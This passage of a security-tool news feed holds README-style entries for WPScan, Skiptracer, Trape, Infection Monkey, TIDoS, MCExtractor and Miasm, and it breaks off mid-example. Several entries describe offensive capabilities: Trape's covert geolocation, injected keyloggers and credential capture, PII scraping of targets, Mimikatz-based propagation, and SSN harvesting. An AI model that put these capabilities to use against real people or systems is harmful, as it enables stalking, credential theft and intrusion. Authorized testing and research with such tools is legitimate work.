WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.
WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.
UPDATE: Checks for updates and upgrades all components used by sniper.
REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.
RELOAD: Reload the master workspace report.

SAMPLE REPORT:
https://gist.github.com/1N3/8214ec2da2c91691bcbc

Download Sn1per v5.0

↧

WPScan v3.4.0 - Black Box WordPress Vulnerability Scanner

November 24, 2018, 12:43 pm

≫ Next: Skiptracer - OSINT Webscaping Framework

≪ Previous: Sn1per v6.0 - Automated Pentest Framework For Offensive Security Experts

WPScan is a free, for non-commercial use, black box WordPress vulnerability scanner written for security professionals and blog maintainers to test the security of their sites.

INSTALL

Prerequisites:

Ruby >= 2.2.2 - Recommended: 2.3.3
Curl >= 7.21 - Recommended: latest - FYI the 7.29 has a segfault
RubyGems - Recommended: latest

From RubyGems:

gem install wpscan

From sources:
Prerequisites: Git

git clone https://github.com/wpscanteam/wpscan
cd wpscan/
bundle install && rake install

Docker
Pull the repo with docker pull wpscanteam/wpscan

Usage
wpscan --url blog.tld This will scan the blog using default options with a good compromise between speed and accuracy. For example, the plugins will be checked passively but their version with a mixed detection mode (passively + aggressively). Potential config backup files will also be checked, along with other interesting findings. If a more stealthy approach is required, then wpscan --stealthy --url blog.tld can be used. As a result, when using the --enumerate option, don't forget to set the --plugins-detection accordingly, as its default is 'passive'.
For more options, open a terminal and type wpscan --help (if you built wpscan from the source, you should type the command outside of the git repo)
The DB is located at ~/.wpscan/db
WPScan can load all options (including the --url) from configuration files, the following locations are checked (order: first to last):

~/.wpscan/cli_options.json
~/.wpscan/cli_options.yml
pwd/.wpscan/cli_options.json
pwd/.wpscan/cli_options.yml

If those files exist, options from them will be loaded and overridden if found twice.
e.g:
~/.wpscan/cli_options.yml:

proxy: 'http://127.0.0.1:8080'
verbose: true

pwd/.wpscan/cli_options.yml:

proxy: 'socks5://127.0.0.1:9090'
url: 'http://target.tld'

Running wpscan in the current directory (pwd), is the same as wpscan -v --proxy socks5://127.0.0.1:9090 --url http://target.tld

PROJECT HOME
https://wpscan.org

VULNERABILITY DATABASE
https://wpvulndb.com

Download Wpscan

↧

Skiptracer - OSINT Webscaping Framework

November 25, 2018, 4:53 am

≫ Next: Trape v2.0 - People Tracker On The Internet: OSINT Analysis And Research Tool

≪ Previous: WPScan v3.4.0 - Black Box WordPress Vulnerability Scanner

Initial attack vectors for recon usually involve utilizing pay-for-data/API (Recon-NG), or paying to utilize transforms (Maltego) to get data mining results. Skiptracer utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget.

Example:

Installation

$ git clone https://github.com/xillwillx/skiptracer.git skiptracer
$ cd skiptracer

Install requirements

$ pip install -r requirements.txt

Run

$ python skiptracer.py -l (phone|email|sn|name|plate)

Usage
Full details on how to use Skiptracer are on the wiki located here

Download Skiptracer

↧

Trape v2.0 - People Tracker On The Internet: OSINT Analysis And Research Tool

November 26, 2018, 3:27 am

≫ Next: Infection Monkey v1.6 - An Automated Pentest Tool

≪ Previous: Skiptracer - OSINT Webscaping Framework

Trape is a OSINT analysis and research tool, which allows people to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information such as the status of sessions of their websites or services and control over their users through the browser, without them knowing, but It evolves with the aim of helping government organizations, companies and researchers to track the cybercriminals.

At the beginning of the year 2018 was presented at BlackHat Arsenal in Singapore: https://www.blackhat.com/asia-18/arsenal.html#jose-pino and in multiple security events worldwide.

Some benefits

LOCATOR OPTIMIZATION: Trace the path between you and the target you're tracking. Each time you make a move, the path will be updated, by means of this the location of the target is obtained silently through a bypass made in the browsers, allowing you not to skip the location request permit on the victim's side , objective or person and at the same time maintain a precision of 99% in the locator.

APPROACH: When you're close to the target, Trape will tell you.

REST API: Generates an API (random or custom), and through this you can control and monitor other Web sites on the Internet remotely, getting the traffic of all visitors.

PROCESS HOOKS: Manages social engineering attacks or processes in the target's browser.
--- SEVERAL: You can issue a phishing attack of any domain or service in real time as well as send malicious files to compromise the device of a target.
--- INJECT JS: You keep the JavaScript code running free in real time, so you can manage the execution of a keylogger or your own custom functions in JS which will be reflected in the target's browser.
--- SPEECH: A process of audio creation is maintained which is played in the browser of the objective, by means of this you can execute personalized messages in different voices with languages in Spanish and English.
PUBLIC NETWORK TUNNEL: Trape has its own API that is linked to ngrok.com to allow the automatic management of public network tunnels; By this you can publish your content of trape server executed locally to the Internet, to manage hooks or public attacks.

CLICK ATTACK TO GET CREDENTIALS: Automatically obtains the target credentials, recognizing your connection availability on a social network or Internet service.

NETWORK: You can get information about the user's network.
--- SPEED: Viewing the target's network speed. (Ping, download, upload, type connection)
--- HOSTS OR DEVICES: Here you can get a scan of all the devices that are connected in the target network automatically.

PROFILE: Brief summary of the target's behavior and important additional information about your device.
--- GPU --- ENERGY

30-session recognition
Session recognition is one of trape most interesting attractions, since you as a researcher can know remotely what service the target is connected to.

USABILITY: You can delete logs and view alerts for each process or action you run against each target.

How to use it
First unload the tool.

git clone https://github.com/jofpin/trape.git
cd trape
python trape.py -h

If it does not work, try to install all the libraries that are located in the file requirements.txt

pip install -r requirements.txt

Example of execution

Example: python trape.py --url http://example.com --port 8080

HELP AND OPTIONS

user:~$ python trape.py --help
usage: python trape.py -u <> -p <> [-h] [-v] [-u URL] [-p PORT]
                                              [-ak ACCESSKEY] [-l LOCAL]
                                              [--update] [-n] [-ic INJC]

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -u URL, --url URL     Put the web page url to clone
  -p PORT, --port PORT  Insert your port
  -ak ACCESSKEY, --accesskey ACCESSKEY
                        Insert your custom key access
  -l LOCAL, --local LOCAL
                        Insert your home file
  -n, --ngrok           Insert your ngrok Authtoken
  -ic INJC, --injectcode INJC
                        Insert your custom REST API path
  -ud UPDATE, --update UPDATE
                        Update trape to the latest version

--url In this option you add the URL you use to clone Live, which works as a decoy.
--port Here you insert the port, where you are going to run the trape server.
--accesskey You enter a custom key for the trape panel, if you do not insert it will generate an automatic key.
--injectcode trape contains a REST API to play anywhere, using this option you can customize the name of the file to include, if it does not, generates a random name allusive to a token.
--local Using this option you can call a local HTML file, this is the replacement of the --url option made to run a local lure in trape.
--ngrok In this option you can enter a token, to run at the time of a process. This would replace the token saved in configurations.
--version You can see the version number of trape.
--update Option especially to upgrade to the latest version of trape.
--help It is used to see all the above options, from the executable.

Disclaimer
This tool has been published educational purposes in order to teach people how bad guys could track them or monitor them or obtain information from their credentials, we are not responsible for the use or the scope that may have the People through this project.
We are totally convinced that if we teach how vulnerable things are, we can make the Internet a safer place.

Developer
This development and others, the participants will be mentioned with name, Twitter and charge.

CREATOR
--- Jose Pino - @jofpin - (Security Researcher)

Download Trape v2.0

↧

Infection Monkey v1.6 - An Automated Pentest Tool

November 26, 2018, 12:54 pm

≫ Next: TIDoS-Framework v1.7 - The Offensive Manual Web Application Penetration Testing Framework

≪ Previous: Trape v2.0 - People Tracker On The Internet: OSINT Analysis And Research Tool

The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self-propagate across a data center and reports success to a centralized Monkey Island server.

The Infection Monkey is comprised of two parts:

Monkey - A tool which infects other machines and propagates to them
Monkey Island - A dedicated server to control and visualize the Infection Monkey's progress inside the data center

To read more about the Monkey, visit http://infectionmonkey.com

Main Features
The Infection Monkey uses the following techniques and exploits to propagate to other machines.

Multiple propagation techniques:
- Predefined passwords
- Common logical exploits
- Password stealing using Mimikatz
Multiple exploit methods:
- SSH
- SMB
- RDP
- WMI
- Shellshock
- Conficker
- SambaCry
- Elastic Search (CVE-2015-1427)

Setup
Check out the Setup page in the Wiki or a quick getting started guide.

Building the Monkey from source
If you want to build the monkey from source, see Setup and follow the instructions at the readme files under infection_monkey and monkey_island.

Download Infection Monkey

↧

TIDoS-Framework v1.7 - The Offensive Manual Web Application Penetration Testing Framework

November 27, 2018, 4:37 am

≫ Next: MCExtractor - Intel, AMD, VIA &Amp; Freescale Microcode Extraction Tool

≪ Previous: Infection Monkey v1.6 - An Automated Pentest Tool

TIDoS Framework is a comprehensive web-app audit framework. let's keep this simple

Highlights :-
The main highlights of this framework is:

TIDoS Framework now boasts of a century+ of modules.
A complete versatile framework to cover up everything from Reconnaissance to Vulnerability Analysis.
Has 5 main phases, subdivided into 14 sub-phases consisting a total of 104 modules.
Reconnaissance Phase has 48 modules of its own (including active and passive recon, information disclosure modules).
Scanning & Enumeration Phase has got 15 modules (including port scans, WAF analysis, etc)
Vulnerability Analysis Phase has 36 modules (including most common vulnerabilites in action).
Exploits Castle has only 1 exploit. (purely developmental)
And finally, Auxillaries have got 4 modules. under dev.
All four phases each have a Auto-Awesome module which automates every module for you.
You just need the domain, and leave everything is to this tool.
TIDoS has full verbose out support, so you'll know whats going on.
Fully user friendly interaction environment. (no shits)

Installation :

Clone the repository locally and navigate there:

git clone https://github.com/theinfecteddrake/tidos-framework.git
cd tidos-framework

Install the dependencies:

chmod +x install
./install

Thats it! Now you are good to go! Now lets run the tool:

tidos

Getting Started :-
TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules.
But before that, you need to set your own API KEYS for various OSINT purposes. To do so, open up API_KEYS.py under files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS. Public API KEYS and ACCESS TOKENS for SHODAN and WHATCMS have been provided with the TIDoS release itself. You can still add your own... no harm!
Finally, as the framework opens up, enter the website name eg. http://www.example.com and let TIDoS lead you. Thats it! Its as easy as that.

Recommended:
Follow the order of the tool (Run in a schematic way).
Reconnaissance ➣ Scanning & Enumeration ➣ Vulnerability Analysis

To update this tool, use tidos_updater.py module under tools/ folder.

Flawless Features :-
TIDoS Framework presently supports the following: and is under active development

Reconnaissance + OSINT
- Passive Reconnaissance:
  - Nping Enumeration Via external APi
  - WhoIS Lookup Domain info gathering
  - GeoIP Lookup Pinpoint physical location
  - DNS Configuration Lookup DNSDump
  - Subdomains Lookup Indexed ones
  - Reverse DNS Lookup Host Instances
  - Reverse IP Lookup Hosts on same server
  - Subnets Enumeration Class Based
  - Domain IP History IP Instances
  - Web Links Gatherer Indexed ones
  - Google Search Manual search
  - Google Dorking (multiple modules) Automated
  - Email to Domain Resolver Email WhoIs
  - Wayback Machine Lookups Find Backups
  - Breached Email Check Pwned Email Accounts
  - Enumeration via Google Groups Emails Only
  - Check Alias Availability Social Networks
  - Find PasteBin Posts Domain Based
  - LinkedIn Gathering Employees & Company
  - Google Plus Gathering Domain Profiles
  - Public Contact Info Scraping FULL CONTACT
  - Censys Intel Gathering Domain Based
  - Threat Intelligence Gathering Bad IPs
- Active Reconnaissance
  - Ping Enumeration Advanced
  - CMS Detection (185+ CMSs supported)IMPROVED
  - Advanced Traceroute IMPROVED
  - robots.txt and sitemap.xml Checker
  - Grab HTTP Headers Live Capture
  - Find HTTP Methods Allowed via OPTIONS
  - Detect Server Type IMPROVED
  - Examine SSL Certificate Absolute
  - Apache Status Disclosure Checks File Based
  - WebDAV HTTP Enumeration PROFIND & SEARCH
  - PHPInfo File Enumeration via Bruteforce
  - Comments Scraper Regex Based
  - Find Shared DNS Hosts Name Server Based
  - Alternate Sites Discovery User-Agent Based
  - Discover Interesting Files via Bruteforce
    - Common Backdoor Locations shells, etc.
    - Common Backup Locations .bak, .db, etc.
    - Common Password Locations .pgp, .skr, etc.
    - Common Proxy Path Configs. .pac, etc.
    - Common Dot Files .htaccess, .apache, etc
- Information Disclosure
  - Credit Cards Disclosure If Plaintext
  - Email Harvester IMPROVED
  - Fatal Errors Enumeration Includes Full Path Disclosure
  - Internal IP Disclosure Signature Based
  - Phone Number Havester Signature Based
  - Social Security Number Harvester US Ones
Scanning & Enumeration
- Remote Server WAF Enumeration Generic54 WAFs
- Port Scanning Ingenious Modules
  - Simple Port Scanner via Socket Connections
  - TCP SYN Scan Highly reliable
  - TCP Connect Scan Highly Reliable
  - XMAS Flag Scan Reliable Only in LANs
  - Fin Flag Scan Reliable Only in LANs
  - Port Service Detector
- Web Technology Enumeration Absolute
- Operating System Fingerprinting IMPROVED
- Banner Grabbing of Services via Open Ports
- Interactive Scanning with NMap 16 preloaded modules
- Enumeration Domain-Linked IPs Using CENSYS Database
- Web and Links Crawlers
  - Depth 1 Indexed Uri Crawler
  - Depth 2 Single Page Crawler
  - Depth 3 Web Link Crawler

Vulnerability Analysis
Web-Bugs & Server Misconfigurations
- Insecure CORS Absolute
- Same-Site Scripting Sub-domain based
- Zone Transfer DNS Server based
- Clickjacking
  - Frame-Busting Checks
  - X-FRAME-OPTIONS Header Checks
- Security on Cookies
  - HTTPOnly Flag
  - Secure Flag
- Cloudflare Misconfiguration Check
  - DNS Misconfiguration Checks
  - Online Database Lookup For Breaches
- HTTP Strict Transport Security Usage
  - HTTPS Enabled but no HSTS
- Domain Based Email Spoofing
  - Missing SPF Records
  - Missing DMARC Records
- Host Header Injection
  - Port Based Over HTTP 80
  - X-Forwarded-For Header Injection
- Security Headers Analysis Live Capture
- Cross-Site Tracing HTTP TRACE Method
- Session Fixation via Cookie Injection
- Network Security Misconfig.
  - Checks for TELNET Enabled via Port 23
Serious Web Vulnerabilities
- File Inclusions
  - Local File Inclusion (LFI) Param based
  - Remote File Inclusion (RFI) IMPROVED
    - Parameter Based
    - Pre-loaded Path Based
- OS Command InjectionLinux & Windows (RCE)
- Path Traversal (Sensitive Paths)
- Cross-Site Request Forgery Absolute
- SQL Injection
  - Error Based Injection
    - Cookie Value Based
    - Referer Value Based
    - User-Agent Value Based
    - Auto-gathering IMPROVED
  - Blind Based Injection Crafted Payloads
    - Cookie Value Based
    - Referer Value Based
    - User-Agent Value Based
    - Auto-gathering IMPROVED
- LDAP Injection Parameter Based
- HTML Injection Parameter Based
- Bash Command Injection ShellShock
- XPATH Injection Parameter Based
- Cross-Site Scripting IMPROVED
  - Cookie Value Based
  - Referer Value Based
  - User-Agent Value Based
  - Parameter Value Based Manual
- Unvalidated URL Forwards Open Redirect
- PHP Code Injection Windows + Linux
- HTTP Response Splitting CRLF Injection
  - User-Agent Value Based
  - Parameter value Based Manual
- Sub-domain Takeover 50+ Services
  - Single Sub-domain Manual
  - All Subdomains Automated
Other
- PlainText Protocol Default Credential Bruteforce
  - FTP Protocol Bruteforce
  - SSH Protocol Bruteforce
  - POP 2/3 Protocol Bruteforce
  - SQL Protocol Bruteforce
  - XMPP Protocol Bruteforce
  - SMTP Protocol Bruteforce
  - TELNET Protocol Bruteforce

Auxillary Modules
- Hash Generator MD5, SHA1, SHA256, SHA512
- String & Payload Encoder 7 Categories
- Forensic Image Analysis Metadata Extraction
- Web HoneyPot Probability ShodanLabs HoneyScore
Exploitationpurely developmental
- ShellShock

Other Tools:

net_info.py - Displays information about your network. Located under tools/.
tidos_updater.py - Updates the framework to the latest release via signature matching. Located under `tools/'.

TIDoS In Action:

Version:

v1.7 [latest release] [#stable]

Upcoming:
These are some modules which I have thought of adding:

Some more of Enumeraton & Information Disclosure modules.
Lots more of OSINT & Stuff (let that be a suspense).
More of Auxillary Modules.
Some Exploits are too being worked on.

Ongoing:

Working on a full-featured Web UI implementation on Flask and MongoDB and Node.js.
Working on a new framework, a real framework. To be released with v2
Working on a campaign feature + addition of arguments.
Normal Bug Fixing Stuffs. As per the issues being raised
Some other perks:
- Working on a way for contributing new modules easily.
- A complete new method of multi-threaded fuzzing of parameters.
- Keeping better of new console stuff.

Download TIDoS-Framework

↧

MCExtractor - Intel, AMD, VIA &Amp; Freescale Microcode Extraction Tool

November 27, 2018, 12:57 pm

≫ Next: Miasm - Reverse Engineering Framework In Python

≪ Previous: TIDoS-Framework v1.7 - The Offensive Manual Web Application Penetration Testing Framework

Intel, AMD, VIA & Freescale Microcode Extraction Tool
MC Extractor News Feed
MC Extractor Discussion Topic
Intel, AMD & VIA CPU Microcode Repositories

A. About MC Extractor

MC Extractor is a tool which parses Intel, AMD, VIA and Freescale processor microcode binaries. It can be used by end-users who are looking for all relevant microcode information such as CPUID, Platform, Version, Date, Release, Size, Checksum etc. It is capable of converting Intel microcode containers (dat, inc, h, txt) to binary images for BIOS integration, detecting new/unknown microcodes, checking microcode health, Updated/Outdated status and more. MC Extractor can be also used as a research analysis tool with multiple structures which allow, among others, full parsing & information display of all documented or not microcode Headers. Moreover, with the help of its extensive database, MC Extractor is capable of uniquely categorizing all supported microcodes as well as check for any microcodes which have not been stored at the Microcode Repositories yet.

A1. MC Extractor Features

Supports all current & legacy Microcodes from 1995 and onward
Scans for all Intel, AMD, VIA & Freescale microcodes in one run
Verifies all extracted microcode integrity via Checksums
Checks if all Intel, AMD & VIA microcodes are Latest or Outdated
Converts Intel containers (dat,inc,txt,h) to binary images
Searches on demand for all microcodes based on CPUID
Shows microcode Header structures and details on demand
Ignores most false positives based on sanity checks
Supports known special, fixed or modded microcodes
Ability to quickly add new microcode entries to the database
Ability to detect Intel Production/Pre-Production Release tag
Ability to analyze multiple files by drag & drop or by input path
Ability to ignore extracted duplicates based on name and contents
Reports all microcodes which are not found at the Microcode Repositories
Features command line parameters to enhance functionality & assist research
Features user friendly messages & proper handling of unexpected code errors
Shows results in nice tables with colored text to signify emphasis
Open Source project licensed under GNU GPL v3, comment assisted code

A2. Microcode Repository Database
MC Extractor allows end-users and/or researchers to quickly extract, view, convert & report new microcode versions without the use of special tools or Hex Editors. To do that effectively, a database had to be built. The Intel, AMD & VIA CPU Microcode Repositories is a collection of every Intel, AMD & VIA CPU Microcodes we have found. Its existence is very important for MC Extractor as it allows us to continue doing research, find new types of microcode, compare releases for similarities, check for updated binaries etc. Bundled with MC Extractor is a file called MCE.db which is required for the program to run. It includes entries for all Microcode binaries that are available to us. This accommodates primarily two actions: a) Check whether the imported microcode is up to date and b) Help find new Microcode releases sooner by reporting them at the Intel, AMD & VIA CPU Microcode Repositories Discussion thread.

A3. Sources and Inspiration
MC Extractor was initially based on a fraction of Lordkag's UEFIStrip tool so, first and foremost, I thank him for all his work which inspired this project. Among others, great places to learn about microcodes are Intel's own download site and official documentation, Intel Microcode Patch Authentication, Coreboot (a,b,c), Microparse by Dominic Chen, Ben Hawkes's Notes and Research, Richard A Burton's Microdecode, AIDA64 CPUID dumps, Sandpile CPUID, Free Electrons (a, b), Freescale and many more which I may have forgotten but would have been here otherwise.

B. How to use MC Extractor
There are two ways to use MC Extractor, MCE executable & Command Prompt. The MCE executable allows you to drag & drop one or more firmware and view them one by one or recursively scan entire directories. To manually call MC Extractor, a Command Prompt can be used with -skip as parameter.

B1. MC Extractor Executable
To use MC Extractor, select one or multiple files and Drag & Drop them to its executable. You can also input certain optional parameters either by running MCE directly or by first dropping one or more files to it. Keep in mind that, due to operating system limitations, there is a limit on how many files can be dropped at once. If the latter is a problem, you can always use the -mass parameter to recursively scan entire directories as explained below.

B2. MC Extractor Parameters
There are various parameters which enhance or modify the default behavior of MC Extractor:

-? : Displays help & usage screen
-skip : Skips welcome & options screen
-exit : Skips Press enter to exit prompt
-redir : Enables console redirection support
-mass : Scans all files of a given directory
-info : Displays microcode header(s)
-add : Adds new input microcode to DB
-dbname : Renames input file based on DB name
-cont : Extracts Intel containers (dat,inc,h,txt)
-search : Searches for microcodes based on CPUID
-last : Shows Latest status based on user input
-repo : Builds microcode repositories from input

B3. MC Extractor Error Control
During operation, MC Extractor may encounter issues that can trigger Notes, Warnings and/or Errors. Notes (yellow/green color) provide useful information about a characteristic of this particular firmware. Warnings (purple color) notify the user of possible problems that can cause system instability. Errors (red color) are shown when something unexpected or problematic is encountered.

C. Download MC Extractor
MC Extractor consists of two files, the executable (MCE.exe or MCE) and the database (MCE.db). An already built/frozen/compiled binary is provided by me for Windows only (icon designed by Alfredo Hernandez). Thus, you don't need to manually build/freeze/compile MC Extractor under Windows. Instead, download the latest version from the Releases tab, title should be "MC Extractor v1.X.X". You may need to scroll down a bit if there are DB releases at the top. The latter can be used to update the outdated DB which was bundled with the latest executable release, title should be "DB rXX". To extract the already built/frozen/compiled archive, you need to use programs which support RAR5 compression.

C1. Compatibility
MC Extractor should work at all Windows, Linux or macOS operating systems which have Python 3.6 support. Windows users who plan to use the already built/frozen/compiled binaries must make sure that they have the latest Windows Updates installed which include all required "Universal C Runtime (CRT)" libraries.

C2. Code Prerequisites
To run MC Extractor's python script, you need to have the following 3rd party Python modules installed:

Colorama

pip3 install colorama

PTable

pip3 install https://github.com/platomav/PTable/archive/boxchar.zip

C3. Build/Freeze/Compile with PyInstaller
PyInstaller can build/freeze/compile MC Extractor at all three supported platforms, it is simple to run and gets updated often.

Make sure Python 3.6.0 or newer is installed:

python --version

Use pip to install PyInstaller:

pip3 install pyinstaller

Use pip to install colorama:

pip3 install colorama

Use pip to install PTable:

pip3 install https://github.com/platomav/PTable/archive/boxchar.zip

Build/Freeze/Compile MC Extractor:

pyinstaller --noupx --onefile MCE.py

At dist folder you should find the final MCE executable

D. Pictures
Note: Some pictures are outdated and depict older MC Extractor versions.

Download MCExtractor

↧

Miasm - Reverse Engineering Framework In Python

November 28, 2018, 4:30 am

≫ Next: Mcreator - Encoded Reverse Shell Generator With Techniques To Bypass AV's

≪ Previous: MCExtractor - Intel, AMD, VIA &Amp; Freescale Microcode Extraction Tool

Miasm is a free and open source (GPLv2) reverse engineering framework. Miasm aims to analyze / modify / generate binary programs. Here is a non exhaustive list of features:

Opening / modifying / generating PE / ELF 32 / 64 LE / BE using Elfesteem
Assembling / Disassembling X86 / ARM / MIPS / SH4 / MSP430
Representing assembly semantic using intermediate language
Emulating using JIT (dynamic code analysis, unpacking, ...)
Expression simplification for automatic de-obfuscation
...

See the official blog for more examples and demos.

Basic examples

Assembling / Disassembling
Import Miasm x86 architecture:

>>> from miasm2.arch.x86.arch import mn_x86
>>> from miasm2.core.locationdb import LocationDB

Get a location db:

>>> loc_db = LocationDB()

Assemble a line:

>>> l = mn_x86.fromstring('XOR ECX, ECX', loc_db, 32)
>>> print l
XOR        ECX, ECX
>>> mn_x86.asm(l)
['1\xc9', '3\xc9', 'g1\xc9', 'g3\xc9']

Modify an operand:

>>> l.args[0] = mn_x86.regs.EAX
>>> print l
XOR        EAX, ECX
>>> a = mn_x86.asm(l)
>>> print a
['1\xc8', '3\xc1', 'g1\xc8', 'g3\xc1']

Disassemble the result:

>>> print mn_x86.dis(a[0], 32)
XOR        EAX, ECX

Using Machine abstraction:

>>> from miasm2.analysis.machine import Machine
>>> mn = Machine('x86_32').mn
>>> print mn.dis('\x33\x30', 32)
XOR        ESI, DWORD PTR [EAX]

For Mips:

>>> mn = Machine('mips32b').mn
>>> print  mn.dis('97A30020'.decode('hex'), "b")
LHU        V1, 0x20(SP)

Intermediate representation
Create an instruction:

>>> machine = Machine('arml')
>>> instr = machine.mn.dis('002088e0'.decode('hex'), 'l')
>>> print instr
ADD        R2, R8, R0

Create an intermediate representation object:

>>> ira = machine.ira(loc_db)

Create an empty ircfg

>>> ircfg = ira.new_ircfg()

Add instruction to the pool:

>>> ira.add_instr_to_ircfg(instr, ircfg)

Print current pool:

>>> for lbl, irblock in ircfg.blocks.items():
...     print irblock.to_string(loc_db)
loc_0:
R2 = R8 + R0

IRDst = loc_4

Working with IR, for instance by getting side effects:

>>> for lbl, irblock in ircfg.blocks.iteritems():
...     for assignblk in irblock:
...         rw = assignblk.get_rw()
...         for dst, reads in rw.iteritems():
...             print 'read:   ', [str(x) for x in reads]
...             print 'written:', dst
...             print
...
read:    ['R8', 'R0']
written: R2

read:    []
written: IRDst

Emulation
Giving a shellcode:

00000000 8d4904      lea    ecx, [ecx+0x4]
00000003 8d5b01      lea    ebx, [ebx+0x1]
00000006 80f901      cmp    cl, 0x1
00000009 7405        jz     0x10
0000000b 8d5bff      lea    ebx, [ebx-1]
0000000e eb03        jmp    0x13
00000010 8d5b01      lea    ebx, [ebx+0x1]
00000013 89d8        mov    eax, ebx
00000015 c3          ret
>>> s = '\x8dI\x04\x8d[\x01\x80\xf9\x01t\x05\x8d[\xff\xeb\x03\x8d[\x01\x89\xd8\xc3'

Import the shellcode thanks to the Container abstraction:

>>> from miasm2.analysis.binary import Container
>>> c = Container.from_string(s)
>>> c
<miasm2.analysis.binary.ContainerUnknown object at 0x7f34cefe6090>

Disassembling the shellcode at address 0:

>>> from miasm2.analysis.machine import Machine
>>> machine = Machine('x86_32')
>>> mdis = machine.dis_engine(c.bin_stream)
>>> asmcfg = mdis.dis_multiblock(0)
>>> for block in asmcfg.blocks:
...  print block.to_string(asmcfg.loc_db)
...
loc_0
LEA        ECX, DWORD PTR [ECX + 0x4]
LEA        EBX, DWORD PTR [EBX + 0x1]
CMP        CL, 0x1
JZ         loc_10
->      c_next:loc_b    c_to:loc_10
loc_10
LEA        EBX, DWORD PTR [EBX + 0x1]
->      c_next:loc_13
loc_b
LEA        EBX, DWORD PTR [EBX + 0xFFFFFFFF]
JMP        loc_13
->      c_to:loc_13
loc_13
MOV        EAX, EBX
RET

Initializing the Jit engine with a stack:

>>> jitter = machine.jitter(jit_type='python')
>>> jitter.init_stack()

Add the shellcode in an arbitrary memory location:

>>> run_addr = 0x40000000
>>> from miasm2.jitter.csts import PAGE_READ, PAGE_WRITE
>>> jitter.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, s)

Create a sentinelle to catch the return of the shellcode:

def code_sentinelle(jitter):
    jitter.run = False
    jitter.pc = 0
    return True

>>> jitter.add_breakpoint(0x1337beef, code_sentinelle)
>>> jitter.push_uint32_t(0x1337beef)

Active logs:

>>> jitter.set_trace_log()

Run at arbitrary address:

>>> jitter.init_run(run_addr)
>>> jitter.continue_run()
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000000 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
RIP 0000000040000000
40000000 LEA        ECX, DWORD PTR [ECX+0x4]
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
....
4000000e JMP        loc_0000000040000013:0x40000013
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
RIP 0000000040000013
40000013 MOV        EAX, EBX
RAX 0000000000000000 RBX 0000000000000000 RCX 0000000000000004 RDX 0000000000000000
RSI 0000000000000000 RDI 0000000000000000 RSP 000000000123FFF8 RBP 0000000000000000
zf 0000000000000000 nf 0000000000000000 of 0000000000000000 cf 0000000000000000
RIP 0000000040000013
40000015 RET
>>>

Interacting with the jitter:

>>> jitter.vm
ad 1230000 size 10000 RW_ hpad 0x2854b40
ad 40000000 size 16 RW_ hpad 0x25e0ed0

>>> hex(jitter.cpu.EAX)
'0x0L'
>>> jitter.cpu.ESI = 12

Symbolic execution
Initializing the IR pool:

>>> ira = machine.ira(loc_db)
>>> ircfg = ira.new_ircfg_from_asmcfg(asmcfg)

Initializing the engine with default symbolic values:

>>> from miasm2.ir.symbexec import SymbolicExecutionEngine
>>> sb = SymbolicExecutionEngine(ira)

Launching the execution:

>>> symbolic_pc = sb.run_at(ircfg, 0)
>>> print symbolic_pc
((ECX + 0x4)[0:8] + 0xFF)?(0xB,0x10)

Same, with step logs (only changes are displayed):

>>> sb = SymbolicExecutionEngine(ira, machine.mn.regs.regs_init)
>>> symbolic_pc = sb.run_at(ircfg, 0, step=True)
Instr LEA        ECX, DWORD PTR [ECX + 0x4]
Assignblk:
ECX = ECX + 0x4
________________________________________________________________________________
ECX                = ECX + 0x4
________________________________________________________________________________
Instr LEA        EBX, DWORD PTR [EBX + 0x1]
Assignblk:
EBX = EBX + 0x1
________________________________________________________________________________
EBX                = EBX + 0x1
ECX                = ECX + 0x4
________________________________________________________________________________
Instr CMP        CL, 0x1
Assignblk:
zf = (ECX[0:8] + -0x1)?(0x0,0x1)
nf = (ECX[0:8] + -0x1)[7:8]
pf = parity((ECX[0:8] + -0x1) & 0xFF)
of = ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1))[7:8]
cf = (((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1)) ^ ((ECX[0:8] ^ (ECX[0:8] + -0x1)) & (ECX[0:8] ^ 0x1)))[7:8]
af = ((ECX[0:8] ^ 0x1) ^ (ECX[0:8] + -0x1))[4:5]
________________________________________________________________________________
af                 = (((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[4:5]
pf                 = parity((ECX + 0x4)[0:8] + 0xFF)
zf                 = ((ECX + 0x4)[0:8] + 0xFF)?(0x0,0x1)
ECX                = ECX + 0x4
of                 = ((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1))[7:8]
nf                 = ((ECX + 0x4)[0:8] + 0xFF)[7:8]
cf                 = (((((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8]) & ((ECX + 0x4)[0:8] ^ 0x1)) ^ ((ECX + 0x4)[0:8] + 0xFF) ^ (ECX + 0x4)[0:8] ^ 0x1)[7:8]
EBX                = EBX + 0x1
________________________________________________________________________________
Instr JZ         loc_key_1
Assignblk:
IRDst = zf?(loc_key_1,loc_key_2)
